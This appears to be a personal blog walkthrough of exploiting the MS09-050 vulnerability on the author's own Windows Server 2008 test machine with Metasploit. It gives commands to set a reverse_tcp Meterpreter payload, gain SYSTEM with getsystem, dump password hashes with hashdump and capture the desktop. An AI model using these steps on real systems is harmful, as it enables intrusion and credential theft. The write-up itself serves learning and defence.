Simple Take Over of Windows Server 2008

(Click images to see bigger image.)

I found this little vulnerability while running a Nessus scan and wanted to see what I could do with it. As you see in the screen shot it is a Critical vulnerability called MS09-050


So I started my Metasploit by going to cd /opt/metasploit/apps/pro/msf3 from root


Then type search ms09-050 at the prompt as shown in the screen shot


As you see in the above screen shot you see where the arrow is pointing it says “good”. Cool Right!

Now type “use” as shown, then just copy and past that exploit after


Then you are going to want to see the options available. So type “show options”


Set the ip of the host that you want to exploit as shown above.

Now you want to see what payloads are available. There is a long list of payloads. From what I here the best one is windows/meterpreter/reverse_tcp


Type that command in as shown below, then “show options” to see what options you may have to set and ¬†as you see here we can set a listening host. Set your ip and soon the fun begins.


Now just type in “exploit” then “help” or “?” to see a list of all the fun things you can do to exploit this system.



As you can see below my 2 favorite things are “getsystem” and “hashdump”

getsystem takes control of the system

hashdump dumps the hash and you can see who is a user of the system as well as get the passwords


Got the system


Dumped the hash (note the users)


idletime is a fun command to see how long the system has been idle for

and screenshot is fun to see what is going on

Notice where the screenshot has been saved to. I will show you how to view it.


In the top right of your Kali Linux you see Applications and Places

Click on Places then File System


Then follow the path, click the usr folder


then the share folder


then click the metasploit-framwork folder


Then look for the name of the file that the system gave it


And Bada Boom Bada Bing, here is the desktop of this unsuspecting user. (Actually, it was my own little server that I had running for the purpose of this demonstration.)


This stuff is tons of fun to learn and even better to know how to defend against an attack like this one that can wipeout the entire network.


2 comments on “Simple Take Over of Windows Server 2008

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s